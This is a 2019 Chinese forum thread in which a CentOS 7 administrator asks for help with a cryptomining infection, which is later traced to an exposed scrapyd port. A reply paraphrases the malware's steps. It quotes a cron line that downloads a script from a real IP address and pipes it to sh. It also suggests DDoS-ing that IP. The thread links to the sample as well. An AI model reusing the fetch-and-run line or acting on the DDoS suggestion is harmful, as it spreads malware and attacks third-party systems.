20191210今天发现Centos7服务器挖矿脚本希望问一下怎么解决?
本帖最后由 qianxing 于 2019-12-10 15:22 编辑服务器:
Linux bigdata-service.futurelab.tv 3.10.0-1062.9.1.el7.x86_64 #1 SMP Fri Dec 6 15:49:49 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
NAME="CentOS Linux"
VERSION="7 (Core)"
ID="centos"
ID_LIKE="rhel fedora"
VERSION_ID="7"
PRETTY_NAME="CentOS Linux 7 (Core)"
ANSI_COLOR="0;31"
CPE_NAME="cpe:/o:centos:centos:7"
HOME_URL="https://www.centos.org/"
BUG_REPORT_URL="https://bugs.centos.org/"
CENTOS_MANTISBT_PROJECT="CentOS-7"
CENTOS_MANTISBT_PROJECT_VERSION="7"
REDHAT_SUPPORT_PRODUCT="centos"
REDHAT_SUPPORT_PRODUCT_VERSION="7"
脚本下载:https://www.lanzouj.com/i7xlqwj
解压密码:52pojie
刚才看了一下 依牙牙 现成源码~~一句一句读就懂了先是把你的防火墙停掉然后删除用户 锁定/root/.ssh/ 在就是查看alyun保护程序 然后卸载~中间一大段都是查找相关进程 然后强行终止最后有download()download2()download3() echo "* * * * * $LDR http://185.92.74.42/sc.sh | sh > /dev/null 2>&1" 这个185.92.74.42 如该过是他的IP 直接搞一个DDOS攻击先把他服务器搞崩 (应该有俩) 如果是自己的先到nginx里把访问路径换掉还有这个“kinsing” 最最后应该是sed了这几个进程 先一个一个找到这几个发送文件看看他们都和谁挂钩或者是谁生产的然后一步一步找到头 如果闲麻烦还是备份好数据然后 格式化从装 恢复数据~ 备份数据,重装系统,恢复数据,你无法知道系统哪些文件被替换了 爱吾爱 发表于 2019-12-10 17:18
刚才看了一下 依牙牙 现成源码~~一句一句读就懂了先是把你的防火墙停掉然后删除用户 锁定/root/.ssh/ ...
感谢,我大概是找到漏洞了
是因为scrapyd公网暴露6800端口,他通过这个进行的入侵,现已解决。
页:
[1]